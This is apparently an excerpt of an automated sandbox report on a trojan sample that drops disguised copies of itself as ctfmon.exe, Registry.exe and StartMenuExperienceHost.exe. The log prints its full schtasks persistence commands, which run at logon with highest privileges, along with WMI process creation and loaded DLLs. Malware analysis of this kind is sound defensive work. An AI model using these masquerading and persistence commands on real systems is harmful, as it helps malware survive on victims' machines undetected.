            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F31B5023_2_00007FF848F31B50
            Source: C:\Users\user\StartMenuExperienceHost.exeCode function: 23_2_00007FF848F2364523_2_00007FF848F23645
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F4364524_2_00007FF848F43645
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F55E2124_2_00007FF848F55E21
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F5229024_2_00007FF848F52290
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F56D2824_2_00007FF848F56D28
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F54D6D24_2_00007FF848F54D6D
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F5376824_2_00007FF848F53768
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F5444824_2_00007FF848F54448
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F542E024_2_00007FF848F542E0
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F5070524_2_00007FF848F50705
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F51B5024_2_00007FF848F51B50
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F4364525_2_00007FF848F43645
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F55E2125_2_00007FF848F55E21
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F5229025_2_00007FF848F52290
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F56D2825_2_00007FF848F56D28
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F54D6D25_2_00007FF848F54D6D
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F5376825_2_00007FF848F53768
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F5444825_2_00007FF848F54448
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F542E025_2_00007FF848F542E0
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F5070525_2_00007FF848F50705
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F51B5025_2_00007FF848F51B50
            Source: oFAjWuoHBq.exeStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: Registry.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: StartMenuExperienceHost.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: ctfmon.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030624734.0000000002B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename$ vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030758033.0000000002BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2054815171.000000001BE49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDCLIB.dll, vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDCLIB.dll, vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUserPingCounter.dclib4 vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2053512000.000000001B510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUserPingCounter.dclib4 vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000000.1999703425.000000000081E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2033527159.000000001361C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename$ vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2030660866.0000000002B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exe, 00000000.00000002.2053447566.000000001B4F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
            Source: oFAjWuoHBq.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.csCryptographic APIs: 'TransformBlock'
            Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.csCryptographic APIs: 'TransformFinalBlock'
            Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.csCryptographic APIs: 'CreateDecryptor'
            Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.csCryptographic APIs: 'CreateDecryptor'
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.0000000001210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
            Source: classification engineClassification label: mal100.troj.evad.winEXE@26/20@1/1
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\Public\AccountPictures\Registry.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMutant created: NULL
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b7eea1035ebcdf3fd6cd3ee1f8cb9ab983a1f666
            Source: oFAjWuoHBq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: oFAjWuoHBq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: oFAjWuoHBq.exeReversingLabs: Detection: 78%
            Source: oFAjWuoHBq.exeVirustotal: Detection: 75%
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile read: C:\Users\user\Desktop\oFAjWuoHBq.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\oFAjWuoHBq.exe "C:\Users\user\Desktop\oFAjWuoHBq.exe"
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: unknownProcess created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
            Source: unknownProcess created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
            Source: unknownProcess created: C:\Users\Public\AccountPictures\Registry.exe C:\Users\Public\AccountPictures\Registry.exe
            Source: unknownProcess created: C:\Users\Public\AccountPictures\Registry.exe C:\Users\Public\AccountPictures\Registry.exe
            Source: unknownProcess created: C:\Users\user\StartMenuExperienceHost.exe C:\Users\user\StartMenuExperienceHost.exe
            Source: unknownProcess created: C:\Users\user\StartMenuExperienceHost.exe C:\Users\user\StartMenuExperienceHost.exe
            Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe" Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dnsapi.dllJump to behavior
